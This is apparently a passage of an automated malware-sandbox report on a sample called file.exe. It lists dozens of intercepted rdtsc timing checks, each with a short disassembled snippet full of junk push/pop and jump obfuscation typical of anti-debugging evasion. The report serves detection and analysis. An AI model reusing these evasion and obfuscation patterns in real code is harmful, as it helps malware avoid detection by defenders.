          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 935E59 second address: 935E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jng 00007FAF74D8F586h 0x0000000c pop ebx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 935E66 second address: 935E9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAF74D778DFh 0x00000008 jmp 00007FAF74D778E6h 0x0000000d jno 00007FAF74D778D6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 935E9E second address: 935EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 935EA2 second address: 935EB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D778DCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 936137 second address: 93613D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93613D second address: 936159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FAF74D778D6h 0x0000000a je 00007FAF74D778D6h 0x00000010 popad 0x00000011 pop ebx 0x00000012 jo 00007FAF74D77911h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 936159 second address: 93615F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BFEE second address: 92BFF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BFF2 second address: 92BFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BFFB second address: 92C016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FAF74D778E3h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92C016 second address: 92C03B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jo 00007FAF74D8F586h 0x00000013 jmp 00007FAF74D8F591h 0x00000018 popad 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92C03B second address: 92C05A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAF74D778E7h 0x00000008 jmp 00007FAF74D778E1h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 936D05 second address: 936D2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F593h 0x00000007 jmp 00007FAF74D8F593h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 936D2F second address: 936D3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FAF74D778D6h 0x0000000a jng 00007FAF74D778D6h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9373D3 second address: 937412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007FAF74D8F58Ch 0x0000000d jo 00007FAF74D8F586h 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007FAF74D8F590h 0x0000001b jmp 00007FAF74D8F58Dh 0x00000020 pushad 0x00000021 push esi 0x00000022 pop esi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93CD21 second address: 93CD2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ecx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93CD2D second address: 93CD32 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9419BC second address: 9419C6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAF74D778E7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9419C6 second address: 9419DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF74D8F58Bh 0x00000009 pushad 0x0000000a jnc 00007FAF74D8F586h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9419DE second address: 941A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FAF74D778EAh 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FAF74D778E2h 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941CB5 second address: 941CB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941CB9 second address: 941CBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941E2F second address: 941E33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941E33 second address: 941E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941E39 second address: 941E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FAF74D8F592h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941E57 second address: 941E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941E5D second address: 941E69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jl 00007FAF74D8F586h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941E69 second address: 941E75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FAF74D778D6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941FF5 second address: 941FF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941FF9 second address: 941FFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941FFD second address: 942003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 942003 second address: 942026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FAF74D778DEh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FAF74D778DCh 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 942026 second address: 942043 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FAF74D8F594h 0x00000008 pop edi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945620 second address: 945682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FAF74D778D6h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e jp 00007FAF74D778E4h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 ja 00007FAF74D778E8h 0x0000001e pop eax 0x0000001f sbb esi, 4DC90119h 0x00000025 call 00007FAF74D778D9h 0x0000002a jmp 00007FAF74D778DFh 0x0000002f push eax 0x00000030 pushad 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945CB7 second address: 945CCA instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAF74D8F586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b ja 00007FAF74D8F586h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945DCE second address: 945DD4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94617C second address: 946186 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAF74D8F586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946186 second address: 94618B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94618B second address: 94619F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FAF74D8F586h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94619F second address: 9461B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF74D778E2h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946221 second address: 946273 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAF74D8F597h 0x0000000b popad 0x0000000c xchg eax, ebx 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FAF74D8F588h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 movzx esi, ax 0x0000002a push eax 0x0000002b jp 00007FAF74D8F590h 0x00000031 push eax 0x00000032 push edx 0x00000033 push edx 0x00000034 pop edx 0x00000035 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9464C0 second address: 9464C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9465A3 second address: 9465A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9465A7 second address: 9465B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946637 second address: 946641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FAF74D8F586h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947636 second address: 9476A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 or dword ptr [ebp+122D38ACh], esi 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FAF74D778D8h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a xor si, B200h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007FAF74D778D8h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b xchg eax, ebx 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f jmp 00007FAF74D778DBh 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94752A second address: 947551 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FAF74D8F599h 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9476A0 second address: 9476A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9476A5 second address: 9476AA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9496FC second address: 949700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947EAA second address: 947EAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 949700 second address: 949706 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947EAE second address: 947EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 949706 second address: 94970C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 949D4A second address: 949D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 949D4E second address: 949D58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 949D58 second address: 949D75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F591h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 949D75 second address: 949D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 949D79 second address: 949D83 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAF74D8F586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B252 second address: 94B2A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007FAF74D778D6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FAF74D778D8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 00000000h 0x0000002d mov esi, dword ptr [ebp+122D2D6Eh] 0x00000033 push 00000000h 0x00000035 or dword ptr [ebp+122D2951h], esi 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FAF74D778E1h 0x00000043 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94CC24 second address: 94CC2A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94CC2A second address: 94CC30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94CC30 second address: 94CC3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007FAF74D8F586h 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94D362 second address: 94D385 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAF74D778DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c ja 00007FAF74D778DCh 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E6FB second address: 94E701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 953201 second address: 953207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95524E second address: 955258 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAF74D8F586h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9558B8 second address: 9558CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF74D778E1h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9558CD second address: 9558D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 956ABC second address: 956AC1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 958779 second address: 958783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 958783 second address: 958787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 958787 second address: 958838 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F599h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007FAF74D8F58Ch 0x0000000f popad 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FAF74D8F588h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d add ebx, dword ptr [ebp+122D29D6h] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007FAF74D8F588h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 00000016h 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f jmp 00007FAF74D8F597h 0x00000054 je 00007FAF74D8F58Ch 0x0000005a mov ebx, dword ptr [ebp+122D297Bh] 0x00000060 xchg eax, esi 0x00000061 push eax 0x00000062 push edx 0x00000063 push ecx 0x00000064 jmp 00007FAF74D8F599h 0x00000069 pop ecx 0x0000006a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 958838 second address: 958853 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D778E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop ecx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 957AF4 second address: 957AFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95A746 second address: 95A7D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FAF74D778E5h 0x00000010 popad 0x00000011 pop edi 0x00000012 nop 0x00000013 jmp 00007FAF74D778E0h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007FAF74D778D8h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 mov dword ptr [ebp+122D1F3Eh], esi 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push esi 0x0000003f call 00007FAF74D778D8h 0x00000044 pop esi 0x00000045 mov dword ptr [esp+04h], esi 0x00000049 add dword ptr [esp+04h], 00000017h 0x00000051 inc esi 0x00000052 push esi 0x00000053 ret 0x00000054 pop esi 0x00000055 ret 0x00000056 mov di, 5067h 0x0000005a xchg eax, esi 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007FAF74D778DCh 0x00000062 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959A70 second address: 959A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95A93F second address: 95A943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C5BA second address: 95C5C0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C5C0 second address: 95C5C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C5C6 second address: 95C5CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C5CA second address: 95C5CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C5CE second address: 95C5DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C5DC second address: 95C5E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D5D5 second address: 95D5D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D5D9 second address: 95D5DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C828 second address: 95C82D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
